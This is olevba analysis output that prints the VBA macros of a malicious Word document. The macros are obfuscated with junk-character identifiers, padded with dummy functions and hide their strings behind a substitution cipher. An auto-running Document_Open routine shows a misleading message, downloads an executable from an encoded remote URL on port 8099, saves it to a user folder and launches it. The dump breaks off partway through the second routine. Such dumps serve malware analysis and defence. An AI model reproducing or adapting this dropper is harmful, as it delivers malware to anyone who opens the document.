olevba 0.60.1 on Python 3.11.3 - http://decalage.info/python/oletools
===============================================================================
FILE: ea1e38f0e64061c6b47899741c81e277cbb81b070c30b451a5ebd904158b66fa.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls 
in file: ea1e38f0e64061c6b47899741c81e277cbb81b070c30b451a5ebd904158b66fa.doc - OLE stream: 'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Function awuiut() As Byte
awuiut = 0
Call wiztuo
End Function

Private Sub Document_Open2()
Dim QYgjfSpecialPathOIhb As String
Dim WshShell As Object
Dim ³¬§°®¢¯¡º¥»®½¦¾£¬¦£¥³¼ª¥¥²¿¼¢¡«¨´¸²ª®¬®ª»¿«¢¾¾§®«¾¢¿³²©¿¤©¯§¡««¼¼£³º¤¸¥ºª¤ª¬¿¥§·£´·µ¼©¨µµ»¦½ As Integer
³¬§°®¢¯¡º¥»®½¦¾£¬¦£¥³¼ª¥¥²¿¼¢¡«¨´¸²ª®¬®ª»¿«¢¾¾§®«¾¢¿³²©¿¤©¯§¡««¼¼£³º¤¸¥ºª¤ª¬¿¥§·£´·µ¼©¨µµ»¦½ = Chr(50) + Chr(48) + Chr(48)
  
    

    Set WshShell = CreateObject("WScript.Shell")
    QYgjfSpecialPathOIhb = WshShell.SpecialFolders("Printhood")
Dim ª¥§º«¡»¨«½²··¶¹°¤°¬¥¦´¶¸³®¤¨½³´¿²µ½¬°¹°§¹©©·¤·¢°¯°¸´¾½¤¹¨¬¯¨³»§¯©¶³«ª¹©¦¢¨»¯¯¿¬²¶º£µµ¾¯®½¤¶²¨
Dim ¿¬²¶º£µµ¾¯®½¤¶²¨¼½¥»¾¨ªº¬³³¬§°®¢¯¡º¥»®½¦¾£¬¦£¥³¼ª¥¥²¿¼¢¡«¨´¸²ª®¬®ª»¿«¢¾¾§®«¾¢¿³²©¿
Dim ¿¥§·£´·µ¼©¨µµ»¦½°º¢²½®¼¡££¤¡ª¯ª¸§¿¦¤¢§¸¦¼´°¦¶°¥³¹¡¢©¾¡¼«£®£«©·¡£¦µ´¯¡½®¾©§²¾¿ª¥§º«¡»¨«½²
Dim ºª¤ª¬¿¥§·£´·µ¼©¨µµ»¦½°º¢²½®¼¡££¤¡ª¯ª¸§¿¦¤¢§¸¦¼´°¦¶°¥³¹¡¢©¾¡¼«£®£«©·¡£¦µ´¯¡½®¾©§²¾¿ª¥§º«¡»¨
Dim »®½¦¾£¬¦£¥³¼ª¥¥²¿¼¢¡«¨´¸²ª®¬®ª»¿«¢¾¾§®«¾¢¿³²©¿¤©¯§¡««¼¼£³º¤¸¥ºª¤ª¬¿¥§·£´·µ¼©¨µµ»¦½°º¢²
Dim ··¶¹°¤°¬¥¦´¶¸³®¤¨½³´¿²µ½¬°¹°§¹©©·¤·¢°¯°¸´¾½¤¹¨¬¯¨³»§¯©¶³«ª¹©¦¢¨»¯¯¿¬²¶º£µµ¾¯®½¤¶²¨¼½¥»¾¨ªº¬³ As Integer
Dim ²©¿¤©¯§¡««¼¼£³º¤¸¥ºª¤ª¬¿¥§·£´·µ¼©¨µµ»¦½°º¢²½®¼¡££¤¡ª¯ª¸§¿¦¤¢§¸¦¼´°¦¶°¥³¹¡¢©¾¡¼«£®£
Dim ¼½¥»¾¨ªº¬³³¬§°®¢¯¡º¥»®½¦¾£¬¦£¥³¼ª¥¥²¿¼¢¡«¨´¸²ª®¬®ª»¿«¢¾¾§®«¾¢¿³²©¿¤©¯§¡««¼¼£³º¤¸¥ºª¤ª¬
··¶¹°¤°¬¥¦´¶¸³®¤¨½³´¿²µ½¬°¹°§¹©©·¤·¢°¯°¸´¾½¤¹¨¬¯¨³»§¯©¶³«ª¹©¦¢¨»¯¯¿¬²¶º£µµ¾¯®½¤¶²¨¼½¥»¾¨ªº¬³ = 1



Set ²©¿¤©¯§¡««¼¼£³º¤¸¥ºª¤ª¬¿¥§·£´·µ¼©¨µµ»¦½°º¢²½®¼¡££¤¡ª¯ª¸§¿¦¤¢§¸¦¼´°¦¶°¥³¹¡¢©¾¡¼«£®£ = CreateObject("microsoft.xmlhttp")
Set »®½¦¾£¬¦£¥³¼ª¥¥²¿¼¢¡«¨´¸²ª®¬®ª»¿«¢¾¾§®«¾¢¿³²©¿¤©¯§¡««¼¼£³º¤¸¥ºª¤ª¬¿¥§·£´·µ¼©¨µµ»¦½°º¢² = CreateObject("Shell.Application")

ºª¤ª¬¿¥§·£´·µ¼©¨µµ»¦½°º¢²½®¼¡££¤¡ª¯ª¸§¿¦¤¢§¸¦¼´°¦¶°¥³¹¡¢©¾¡¼«£®£«©·¡£¦µ´¯¡½®¾©§²¾¿ª¥§º«¡»¨ = QYgjfSpecialPathOIhb + ¶³«ª¹©¦¢¨»¯¯¿¬²¶º£µµ¾¯®½¤¶²¨¼½¥»¾¨ªº¬³³¬§°®¢¯¡º¥»®½¦¾£¬¦£¥³¼ª¥¥²¿¼¢¡«¨´¸²ª®¬®ª»¿«¢¾¾§("\¥ØZJW.ÂÛÂ")
²©¿¤©¯§¡««¼¼£³º¤¸¥ºª¤ª¬¿¥§·£´·µ¼©¨µµ»¦½°º¢²½®¼¡££¤¡ª¯ª¸§¿¦¤¢§¸¦¼´°¦¶°¥³¹¡¢©¾¡¼«£®£.Open "get", ¶³«ª¹©¦¢¨»¯¯¿¬²¶º£µµ¾¯®½¤¶²¨¼½¥»¾¨ªº¬³³¬§°®¢¯¡º¥»®½¦¾£¬¦£¥³¼ª¥¥²¿¼¢¡«¨´¸²ª®¬®ª»¿«¢¾¾§("hÖÖÓ://bÀgÕÔÀd.ÁÒm:8099/vÒÔÔÜ/ÕÂÔvÂÔ1.ÂÛÂ"), False
²©¿¤©¯§¡««¼¼£³º¤¸¥ºª¤ª¬¿¥§·£´·µ¼©¨µµ»¦½°º¢²½®¼¡££¤¡ª¯ª¸§¿¦¤¢§¸¦¼´°¦¶°¥³¹¡¢©¾¡¼«£®£.send
¿¬²¶º£µµ¾¯®½¤¶²¨¼½¥»¾¨ªº¬³³¬§°®¢¯¡º¥»®½¦¾£¬¦£¥³¼ª¥¥²¿¼¢¡«¨´¸²ª®¬®ª»¿«¢¾¾§®«¾¢¿³²©¿ = ²©¿¤©¯§¡««¼¼£³º¤¸¥ºª¤ª¬¿¥§·£´·µ¼©¨µµ»¦½°º¢²½®¼¡££¤¡ª¯ª¸§¿¦¤¢§¸¦¼´°¦¶°¥³¹¡¢©¾¡¼«£®£.responseBody
If ²©¿¤©¯§¡««¼¼£³º¤¸¥ºª¤ª¬¿¥§·£´·µ¼©¨µµ»¦½°º¢²½®¼¡££¤¡ª¯ª¸§¿¦¤¢§¸¦¼´°¦¶°¥³¹¡¢©¾¡¼«£®£.Status = 200 Then
Set ª¥§º«¡»¨«½²··¶¹°¤°¬¥¦´¶¸³®¤¨½³´¿²µ½¬°¹°§¹©©·¤·¢°¯°¸´¾½¤¹¨¬¯¨³»§¯©¶³«ª¹©¦¢¨»¯¯¿¬²¶º£µµ¾¯®½¤¶²¨ = CreateObject("adodb.stream")
ª¥§º«¡»¨«½²··¶¹°¤°¬¥¦´¶¸³®¤¨½³´¿²µ½¬°¹°§¹©©·¤·¢°¯°¸´¾½¤¹¨¬¯¨³»§¯©¶³«ª¹©¦¢¨»¯¯¿¬²¶º£µµ¾¯®½¤¶²¨.Open
ª¥§º«¡»¨«½²··¶¹°¤°¬¥¦´¶¸³®¤¨½³´¿²µ½¬°¹°§¹©©·¤·¢°¯°¸´¾½¤¹¨¬¯¨³»§¯©¶³«ª¹©¦¢¨»¯¯¿¬²¶º£µµ¾¯®½¤¶²¨.Type = ··¶¹°¤°¬¥¦´¶¸³®¤¨½³´¿²µ½¬°¹°§¹©©·¤·¢°¯°¸´¾½¤¹¨¬¯¨³»§¯©¶³«ª¹©¦¢¨»¯¯¿¬²¶º£µµ¾¯®½¤¶²¨¼½¥»¾¨ªº¬³
ª¥§º«¡»¨«½²··¶¹°¤°¬¥¦´¶¸³®¤¨½³´¿²µ½¬°¹°§¹©©·¤·¢°¯°¸´¾½¤¹¨¬¯¨³»§¯©¶³«ª¹©¦¢¨»¯¯¿¬²¶º£µµ¾¯®½¤¶²¨.Write ¿¬²¶º£µµ¾¯®½¤¶²¨¼½¥»¾¨ªº¬³³¬§°®¢¯¡º¥»®½¦¾£¬¦£¥³¼ª¥¥²¿¼¢¡«¨´¸²ª®¬®ª»¿«¢¾¾§®«¾¢¿³²©¿
ª¥§º«¡»¨«½²··¶¹°¤°¬¥¦´¶¸³®¤¨½³´¿²µ½¬°¹°§¹©©·¤·¢°¯°¸´¾½¤¹¨¬¯¨³»§¯©¶³«ª¹©¦¢¨»¯¯¿¬²¶º£µµ¾¯®½¤¶²¨.SaveToFile ºª¤ª¬¿¥§·£´·µ¼©¨µµ»¦½°º¢²½®¼¡££¤¡ª¯ª¸§¿¦¤¢§¸¦¼´°¦¶°¥³¹¡¢©¾¡¼«£®£«©·¡£¦µ´¯¡½®¾©§²¾¿ª¥§º«¡»¨, ··¶¹°¤°¬¥¦´¶¸³®¤¨½³´¿²µ½¬°¹°§¹©©·¤·¢°¯°¸´¾½¤¹¨¬¯¨³»§¯©¶³«ª¹©¦¢¨»¯¯¿¬²¶º£µµ¾¯®½¤¶²¨¼½¥»¾¨ªº¬³ + ··¶¹°¤°¬¥¦´¶¸³®¤¨½³´¿²µ½¬°¹°§¹©©·¤·¢°¯°¸´¾½¤¹¨¬¯¨³»§¯©¶³«ª¹©¦¢¨»¯¯¿¬²¶º£µµ¾¯®½¤¶²¨¼½¥»¾¨ªº¬³
ª¥§º«¡»¨«½²··¶¹°¤°¬¥¦´¶¸³®¤¨½³´¿²µ½¬°¹°§¹©©·¤·¢°¯°¸´¾½¤¹¨¬¯¨³»§¯©¶³«ª¹©¦¢¨»¯¯¿¬²¶º£µµ¾¯®½¤¶²¨.Close
End If
»®½¦¾£¬¦£¥³¼ª¥¥²¿¼¢¡«¨´¸²ª®¬®ª»¿«¢¾¾§®«¾¢¿³²©¿¤©¯§¡««¼¼£³º¤¸¥ºª¤ª¬¿¥§·£´·µ¼©¨µµ»¦½°º¢².Open (ºª¤ª¬¿¥§·£´·µ¼©¨µµ»¦½°º¢²½®¼¡££¤¡ª¯ª¸§¿¦¤¢§¸¦¼´°¦¶°¥³¹¡¢©¾¡¼«£®£«©·¡£¦µ´¯¡½®¾©§²¾¿ª¥§º«¡»¨)
End Sub
Function wiztuo() As Currency
wiztuo = 1000000000
Call Bitiob
End Function
Function Bitiob() As Double
Call RUitiobb
End Function
Function RUitiobb() As Integer
RUitiobb = 41
Call Hiotbdek
End Function
Function Hiotbdek() As Long
Hiotbdek = Hiotbdek
Call Jiotbdek
End Function


    Public Function ·½ºª¬²¾¢§©¢¸¯¢©£»¸¦¤¿¤¡´¢¯©¨©§·»¿³ºº«©¨¬³»·£®¬°®«£¥¯§¸¸¦¢¶¨´©¶¯°¯¨«¡ª³§¡´°¸®¤°²·ª®µ¶¦£(¹¾¸¥§§¨¥®ª¦µª«¢¨¦«´ª¹·¤ª²¤©¡µ¥¥®¬´¸¿²½²¿¥³¥¦ª°¡½³¹½»®££º»¯¡«¶¿´¸¬§®¶³³²µ¤¨¤¾¡©°³´¢½°¬¹·¡¼¶°¹)
        µ£«µ¬¥´¨³¦¤¼µ´¡»¹¨µ«¨ª¤¢·«ª¥²¢¿¦µ®£¦¬·¼¼»¾¶²¶§°°º¼½¹§²£¬¸¹©¸º¬¦¶¾·¢¾£¤½²¼´·©·½ºª¬²¾¢§© = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãäåØ¶§Ú¥"
        ¢¸¯¢©£»¸¦¤¿¤¡´¢¯©¨©§·»¿³ºº«©¨¬³»·£®¬°®«£¥¯§¸¸¦¢¶¨´©¶¯°¯¨«¡ª³§¡´°¸®¤°²·ª®µ¶¦£¹¾¸¥§§¨¥®ª¦ = " ¿¡@#$%^&*()_+|01²³456789ÀbÁdÂÃghÄjklmÅÒÓqÔÕÖÙvwÛÜz.,-~AàáâãFGHäJKåMNØ¶QR§TÚVWX¥Z?!23acefinoprstuxyBCDEILOPSUY"
        For R = 1 To Len(¹¾¸¥§§¨¥®ª¦µª«¢¨¦«´ª¹·¤ª²¤©¡µ¥¥®¬´¸¿²½²¿¥³¥¦ª°¡½³¹½»®££º»¯¡«¶¿´¸¬§®¶³³²µ¤¨¤¾¡©°³´¢½°¬¹·¡¼¶°¹)
            µª«¢¨¦«´ª¹·¤ª²¤©¡µ¥¥®¬´¸¿²½²¿¥³¥¦ª°¡½³¹½»®££º»¯¡«¶¿´¸¬§®¶³³²µ¤¨¤¾¡©°³´¢½°¬¹·¡¼¶°¹¿µµ£«µ¬¥´¨ = InStr(µ£«µ¬¥´¨³¦¤¼µ´¡»¹¨µ«¨ª¤¢·«ª¥²¢¿¦µ®£¦¬·¼¼»¾¶²¶§°°º¼½¹§²£¬¸¹©¸º¬¦¶¾·¢¾£¤½²¼´·©·½ºª¬²¾¢§©, Mid(¹¾¸¥§§¨¥®ª¦µª«¢¨¦«´ª¹·¤ª²¤©¡µ¥¥®¬´¸¿²½²¿¥³¥¦ª°¡½³¹½»®££º»¯¡«¶¿´¸¬§®¶³³²µ¤¨¤¾¡©°³´¢½°¬¹·¡¼¶°¹, R, 1))
            If µª«¢¨¦«´ª¹·¤ª²¤©¡µ¥¥®¬´¸¿²½²¿¥³¥¦ª°¡½³¹½»®££º»¯¡«¶¿´¸¬§®¶³³²µ¤¨¤¾¡©°³´¢½°¬¹·¡¼¶°¹¿µµ£«µ¬¥´¨ > 0 Then
                ³¦¤¼µ´¡»¹¨µ«¨ª¤¢·«ª¥²¢¿¦µ®£¦¬·¼¼»¾¶²¶§°°º¼½¹§²£¬¸¹©¸º¬¦¶¾·¢¾£¤½²¼´·©·½ºª¬²¾¢§©¢¸¯¢©£»¸¦¤¿¤¡´¢¯ = Mid(¢¸¯¢©£»¸¦¤¿¤¡´¢¯©¨©§·»¿³ºº«©¨¬³»·£®¬°®«£¥¯§¸¸¦¢¶¨´©¶¯°¯¨«¡ª³§¡´°¸®¤°²·ª®µ¶¦£¹¾¸¥§§¨¥®ª¦, µª«¢¨¦«´ª¹·¤ª²¤©¡µ¥¥®¬´¸¿²½²¿¥³¥¦ª°¡½³¹½»®££º»¯¡«¶¿´¸¬§®¶³³²µ¤¨¤¾¡©°³´¢½°¬¹·¡¼¶°¹¿µµ£«µ¬¥´¨, 1)
                ©¨©§·»¿³ºº«©¨¬³»·£®¬°®«£¥¯§¸¸¦¢¶¨´©¶¯°¯¨«¡ª³§¡´°¸®¤°²·ª®µ¶¦£¹¾¸¥§§¨¥®ª¦µª«¢¨¦«´ª¹·¤ª²¤©¡µ¥¥®¬ = ©¨©§·»¿³ºº«©¨¬³»·£®¬°®«£¥¯§¸¸¦¢¶¨´©¶¯°¯¨«¡ª³§¡´°¸®¤°²·ª®µ¶¦£¹¾¸¥§§¨¥®ª¦µª«¢¨¦«´ª¹·¤ª²¤©¡µ¥¥®¬ + ³¦¤¼µ´¡»¹¨µ«¨ª¤¢·«ª¥²¢¿¦µ®£¦¬·¼¼»¾¶²¶§°°º¼½¹§²£¬¸¹©¸º¬¦¶¾·¢¾£¤½²¼´·©·½ºª¬²¾¢§©¢¸¯¢©£»¸¦¤¿¤¡´¢¯
            Else
                ©¨©§·»¿³ºº«©¨¬³»·£®¬°®«£¥¯§¸¸¦¢¶¨´©¶¯°¯¨«¡ª³§¡´°¸®¤°²·ª®µ¶¦£¹¾¸¥§§¨¥®ª¦µª«¢¨¦«´ª¹·¤ª²¤©¡µ¥¥®¬ = ©¨©§·»¿³ºº«©¨¬³»·£®¬°®«£¥¯§¸¸¦¢¶¨´©¶¯°¯¨«¡ª³§¡´°¸®¤°²·ª®µ¶¦£¹¾¸¥§§¨¥®ª¦µª«¢¨¦«´ª¹·¤ª²¤©¡µ¥¥®¬ + Mid(¹¾¸¥§§¨¥®ª¦µª«¢¨¦«´ª¹·¤ª²¤©¡µ¥¥®¬´¸¿²½²¿¥³¥¦ª°¡½³¹½»®££º»¯¡«¶¿´¸¬§®¶³³²µ¤¨¤¾¡©°³´¢½°¬¹·¡¼¶°¹, R, 1)
            End If
        Next
        ·½ºª¬²¾¢§©¢¸¯¢©£»¸¦¤¿¤¡´¢¯©¨©§·»¿³ºº«©¨¬³»·£®¬°®«£¥¯§¸¸¦¢¶¨´©¶¯°¯¨«¡ª³§¡´°¸®¤°²·ª®µ¶¦£ = ©¨©§·»¿³ºº«©¨¬³»·£®¬°®«£¥¯§¸¸¦¢¶¨´©¶¯°¯¨«¡ª³§¡´°¸®¤°²·ª®µ¶¦£¹¾¸¥§§¨¥®ª¦µª«¢¨¦«´ª¹·¤ª²¤©¡µ¥¥®¬
    End Function
    
    
Function Jiotbdek() As Single
Jiotbdek = Jiotbdek
Call finiotbdek
End Function
Function finiotbdek() As Date

End Function

   Public Function ¶³«ª¹©¦¢¨»¯¯¿¬²¶º£µµ¾¯®½¤¶²¨¼½¥»¾¨ªº¬³³¬§°®¢¯¡º¥»®½¦¾£¬¦£¥³¼ª¥¥²¿¼¢¡«¨´¸²ª®¬®ª»¿«¢¾¾§(®«¾¢¿³²©¿¤©¯§¡««¼¼£³º¤¸¥ºª¤ª¬¿¥§·£´·µ¼©¨µµ»¦½°º¢²½®¼¡££¤¡ª¯ª¸§¿¦¤¢§¸¦¼´°¦¶°¥³¹¡¢©¾¡¼«)
        «½²··¶¹°¤°¬¥¦´¶¸³®¤¨½³´¿²µ½¬°¹°§¹©©·¤·¢°¯°¸´¾½¤¹¨¬¯¨³»§¯©¶³«ª¹©¦¢¨»¯¯¿¬²¶º£µµ¾¯®½¤¶²¨¼½¥»¾¨ªº¬³ = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãäåØ¶§Ú¥"
        ³¬§°®¢¯¡º¥»®½¦¾£¬¦£¥³¼ª¥¥²¿¼¢¡«¨´¸²ª®¬®ª»¿«¢¾¾§®«¾¢¿³²©¿¤©¯§¡««¼¼£³º¤¸¥ºª¤ª¬¿¥§·£´·µ¼© = " ¿¡@#$%^&*()_+|01²³456789ÀbÁdÂÃghÄjklmÅÒÓqÔÕÖÙvwÛÜz.,-~AàáâãFGHäJKåMNØ¶QR§TÚVWX¥Z?!23acefinoprstuxyBCDEILOPSUY"
        For D = 1 To Len(®«¾¢¿³²©¿¤©¯§¡««¼¼£³º¤¸¥ºª¤ª¬¿¥§·£´·µ¼©¨µµ»¦½°º¢²½®¼¡££¤¡ª¯ª¸§¿¦¤¢§¸¦¼´°¦¶°¥³¹¡¢©¾¡¼«)
            ¨µµ»¦½°º¢²½®¼¡££¤¡ª¯ª¸§¿¦¤¢§¸¦¼´°¦¶°¥³¹¡¢©¾¡¼«£®£«©·¡£¦µ´¯¡½®¾©§²¾¿ª¥§º«¡»¨«½²··¶¹°¤°¬¥¦´¶¸³®¤ = InStr(«½²··¶¹°¤°¬¥¦´¶¸³®¤¨½³´¿²µ½¬°¹°§¹©©·¤·¢°¯°¸´¾½¤¹¨¬¯¨³»§¯©¶³«ª¹©¦¢¨»¯¯¿¬²¶º£µµ¾¯®½¤¶²¨¼½¥»¾¨ªº¬³, Mid(®«¾¢¿³²©¿¤©¯§¡««¼¼£³º¤¸¥ºª¤ª¬¿¥§·£´·µ¼©¨µµ»¦½°º¢²½®¼¡££¤¡ª¯ª¸§¿¦¤¢§¸¦¼´°¦¶°¥³¹¡¢©¾¡¼«, D, 1))
            If ¨µµ»¦½°º¢²½®¼¡££¤¡ª¯ª¸§¿¦¤¢§¸¦¼´°¦¶°¥³¹¡¢©¾¡¼«£®£«©·¡£¦µ´¯¡½®¾©§²¾¿ª¥§º«¡»¨«½²··¶¹°¤°¬¥¦´¶¸³®¤ > 0 Then
                ¨½³´¿²µ½¬°¹°§¹©©·¤·¢°¯°¸´¾½¤¹¨¬¯¨³»§¯©¶³«ª¹©¦¢¨»¯¯¿¬²¶º£µµ¾¯®½¤¶²¨¼½¥»¾¨ªº¬³³¬§°®¢¯¡º¥»®½¦¾£¬ = Mid(³¬§°®¢¯¡º¥»®½¦¾£¬¦£¥³¼ª¥¥²¿¼¢¡«¨´¸²ª®¬®ª»¿«¢¾¾§®«¾¢¿³²©¿¤©¯§¡««¼¼£³º¤¸¥ºª¤ª¬¿¥§·£´·µ¼©, ¨µµ»¦½°º¢²½®¼¡££¤¡ª¯ª¸§¿¦¤¢§¸¦¼´°¦¶°¥³¹¡¢©¾¡¼«£®£«©·¡£¦µ´¯¡½®¾©§²¾¿ª¥§º«¡»¨«½²··¶¹°¤°¬¥¦´¶¸³®¤, 1)
                ¦£¥³¼ª¥¥²¿¼¢¡«¨´¸²ª®¬®ª»¿«¢¾¾§®«¾¢¿³²©¿¤©¯§¡««¼¼£³º¤¸¥ºª¤ª¬¿¥§·£´·µ¼©¨µµ»¦½°º¢²½®¼ = ¦£¥³¼ª¥¥²¿¼¢¡«¨´¸²ª®¬®ª»¿«¢¾¾§®«¾¢¿³²©¿¤©¯§¡««¼¼£³º¤¸¥ºª¤ª¬¿¥§·£´·µ¼©¨µµ»¦½°º¢²½®¼ + ¨½³´¿²µ½¬°¹°§¹©©·¤·¢°¯°¸´¾½¤¹¨¬¯¨³»§¯©¶³«ª¹©¦¢¨»¯¯¿¬²¶º£µµ¾¯®½¤¶²¨¼½¥»¾¨ªº¬³³¬§°®¢¯¡º¥»®½¦¾£¬
            Else
                ¦£¥³¼ª¥¥²¿¼¢¡«¨´¸²ª®¬®ª»¿«¢¾¾§®«¾¢¿³²©¿¤©¯§¡««¼¼£³º¤¸¥ºª¤ª¬¿¥§·£´·µ¼©¨µµ»¦½°º¢²½®¼ = ¦£¥³¼ª¥¥²¿¼¢¡«¨´¸²ª®¬®ª»¿«¢¾¾§®«¾¢¿³²©¿¤©¯§¡««¼¼£³º¤¸¥ºª¤ª¬¿¥§·£´·µ¼©¨µµ»¦½°º¢²½®¼ + Mid(®«¾¢¿³²©¿¤©¯§¡««¼¼£³º¤¸¥ºª¤ª¬¿¥§·£´·µ¼©¨µµ»¦½°º¢²½®¼¡££¤¡ª¯ª¸§¿¦¤¢§¸¦¼´°¦¶°¥³¹¡¢©¾¡¼«, D, 1)
            End If
        Next
        ¶³«ª¹©¦¢¨»¯¯¿¬²¶º£µµ¾¯®½¤¶²¨¼½¥»¾¨ªº¬³³¬§°®¢¯¡º¥»®½¦¾£¬¦£¥³¼ª¥¥²¿¼¢¡«¨´¸²ª®¬®ª»¿«¢¾¾§ = ¦£¥³¼ª¥¥²¿¼¢¡«¨´¸²ª®¬®ª»¿«¢¾¾§®«¾¢¿³²©¿¤©¯§¡««¼¼£³º¤¸¥ºª¤ª¬¿¥§·£´·µ¼©¨µµ»¦½°º¢²½®¼
    End Function



Function Dionbt() As Currency
Call tiuoty
End Function
Function tiuoty() As Boolean
tiuoty = False
Call awuiut
End Function

Private Sub Document_Open()
Dim UtfvSpecialPathKHVjh As String
Dim WshShell As Object
Dim ¯©¨©§·»¿³ºº«©¨¬³»·£®¬°®«£¥¯§¸¸¦¢¶¨´©¶¯°¯¨«¡ª³§¡´°¸®¤°²·ª®µ¶¦£¹¾¸¥§§¨¥®ª¦µª«¢¨¦«´ª¹·¤ª²¤© As Integer
¯©¨©§·»¿³ºº«©¨¬³»·£®¬°®«£¥¯§¸¸¦¢¶¨´©¶¯°¯¨«¡ª³§¡´°¸®¤°²·ª®µ¶¦£¹¾¸¥§§¨¥®ª¦µª«¢¨¦«´ª¹·¤ª²¤© = Chr(50) + Chr(48) + Chr(48)
  
    

    Set WshShell = CreateObject("WScript.Shell")
    UtfvSpecialPathKHVjh = WshShell.SpecialFolders("Recent")
Dim ´¨³¦¤¼µ´¡»¹¨µ«¨ª¤¢·«ª¥²¢¿¦µ®£¦¬·¼¼»¾¶²¶§°°º¼½¹§²£¬¸¹©¸º¬¦¶¾·¢¾£¤½²¼´·©·½ºª¬²¾¢§©¢¸¯¢
Dim ¢©£»¸¦¤¿¤¡´¢¯©¨©§·»¿³ºº«©¨¬³»·£®¬°®«£¥¯§¸¸¦¢¶¨´©¶¯°¯¨«¡ª³§¡´°¸®¤°²·ª®µ¶¦£¹¾¸¥§§¨¥
Dim ¦µª«¢¨¦«´ª¹·¤ª²¤©¡µ¥¥®¬´¸¿²½²¿¥³¥¦ª°¡½³¹½»®££º»¯¡«¶¿´¸¬§®¶³³²µ¤¨¤¾¡©°³´¢½°¬¹·¡¼¶°¹¿µµ£«
Dim §¨¥®ª¦µª«¢¨¦«´ª¹·¤ª²¤©¡µ¥¥®¬´¸¿²½²¿¥³¥¦ª°¡½³¹½»®££º»¯¡«¶¿´¸¬§®¶³³²µ¤¨¤¾¡©°³´¢½°¬¹·¡¼¶°¹¿µ
Dim ¶¾·¢¾£¤½²¼´·©·½ºª¬²¾¢§©¢¸¯¢©£»¸¦¤¿¤¡´¢¯©¨©§·»¿³ºº«©¨¬³»·£®¬°®«£¥¯§¸¸¦¢¶¨´©¶¯°¯¨«¡ª³§¡´°¸®¤°²·ª
Dim µ¬¥´¨³¦¤¼µ´¡»¹¨µ«¨ª¤¢·«ª¥²¢¿¦µ®£¦¬·¼¼»¾¶²¶§°°º¼½¹§²£¬¸¹©¸º¬¦¶¾·¢¾£¤½²¼´·©·½ºª¬²¾¢§©¢¸¯¢©£»¸¦¤¿¤¡´¢ As Integer
Dim §§¨¥®ª¦µª«¢¨¦«´ª¹·¤ª²¤©¡µ¥¥®¬´¸¿²½²¿¥³¥¦ª°¡½³¹½»®££º»¯¡«¶¿´¸¬§®¶³³²µ¤¨¤¾¡©°³´¢½°¬¹·¡¼¶°¹
Dim ©£»¸¦¤¿¤¡´¢¯©¨©§·»¿³ºº«©¨¬³»·£®¬°®«£¥¯§¸¸¦¢¶¨´©¶¯°¯¨«¡ª³§¡´°¸®¤°²·ª®µ¶¦£¹¾¸¥§§¨¥®ª
µ¬¥´¨³¦¤¼µ´¡»¹¨µ«¨ª¤¢·«ª¥²¢¿¦µ®£¦¬·¼¼»¾¶²¶§°°º¼½¹§²£¬¸¹©¸º¬¦¶¾·¢¾£¤½²¼´·©·½ºª¬²¾¢§©¢¸¯¢©£»¸¦¤¿¤¡´¢ = 1


MsgBox "Advertencia: Macro cargada....(Recargar documento)"

Set §§¨¥®ª¦µª«¢¨¦«´ª¹·¤ª²¤©¡µ¥¥®¬´¸¿²½²¿¥³¥¦ª°¡½³¹½»®££º»¯¡«¶¿´¸¬§®¶³³²µ¤¨¤¾¡©°³´¢½°¬¹·¡¼¶°¹ = CreateObject("microsoft.xmlhttp")
Set ¶¾·¢¾£¤½²¼´·©·½ºª¬²¾¢§©¢¸¯¢©£»¸¦¤¿¤¡´¢¯©¨©§·»¿³ºº«©¨¬³»·£®¬°®«£¥¯§¸¸¦¢¶¨´©¶¯°¯¨«¡ª³§¡´°¸®¤°²·ª = CreateObject("Shell.Application")

§¨¥®ª¦µª«¢¨¦«´ª¹·¤ª²¤©¡µ¥¥®¬´¸¿²½²¿¥³¥¦ª°¡½³¹½»®££º»¯¡«¶¿´¸¬§®¶³³²µ¤¨¤¾¡©°³´¢½°¬¹·¡¼¶°¹¿µ = UtfvSpecialPathKHVjh + ·½ºª¬²¾¢§©¢¸¯¢©£»¸¦¤¿¤¡´¢¯©¨©§·»¿³ºº«©¨¬³»·£®¬°®«£¥¯§¸¸¦¢¶¨´©¶¯°¯¨«¡ª³§¡´°¸®¤°²·ª®µ¶¦£("\Hä§HJQV.ÂÛÂ")
§§¨¥®ª¦µª«¢¨¦«´ª¹·¤ª²¤©¡µ¥¥®¬´¸¿²½²¿¥³¥¦ª°¡½³¹½»®££º»¯¡«¶¿´¸¬§®¶³³²µ¤¨¤¾¡©°³´¢½°¬¹·¡¼¶°¹.Open "get", ·½ºª¬²¾¢§©¢¸¯¢©£»¸¦¤¿¤¡´¢¯©¨©§·»¿³ºº«©¨¬³»·£®¬°®«£¥¯§¸¸¦¢¶¨´©¶¯°¯¨«¡ª³§¡´°¸®¤°²·ª®µ¶¦£("hÖÖÓ://bÀgÕÔÀd.ÁÒm:8099/ÜÒÔÔÜ/ÕÂÔvÂÔ1.ÂÛÂ"), False
§§¨¥®ª¦µª«¢¨¦«´ª¹·¤ª²¤©¡µ¥¥®¬´¸¿²½²¿¥³¥¦ª°¡½³¹½»®££º»¯¡«¶¿´¸¬§®¶³³²µ¤¨¤¾¡©°³´¢½°¬¹·¡¼¶°¹.send
¢©£»¸¦¤¿¤¡´¢¯©¨©§·»¿³ºº«©¨¬³»·£®¬°®«£¥¯§¸¸¦¢¶¨´©¶¯°¯¨«¡ª³§¡´°¸®¤°²·ª®µ¶¦£¹¾¸¥§§¨¥ = §§¨¥®ª¦µª«¢¨¦«´ª¹·¤ª²¤©¡µ¥¥®¬´¸¿²½²¿¥³¥¦ª°¡½³¹½»®££º»¯¡«¶¿´¸¬§®¶³³²µ¤¨¤¾¡©°³´¢½°¬¹·¡¼¶°¹.responseBody
If §§¨¥®ª¦µª«¢¨¦«´ª¹·¤ª²¤©¡µ¥¥®¬´¸¿²½²¿¥³¥¦ª°¡½³¹½»®££º»¯¡«¶¿´¸¬§®¶³³²µ¤¨¤¾¡©°³´¢½°¬¹·¡¼¶°¹.Status = 200 Then
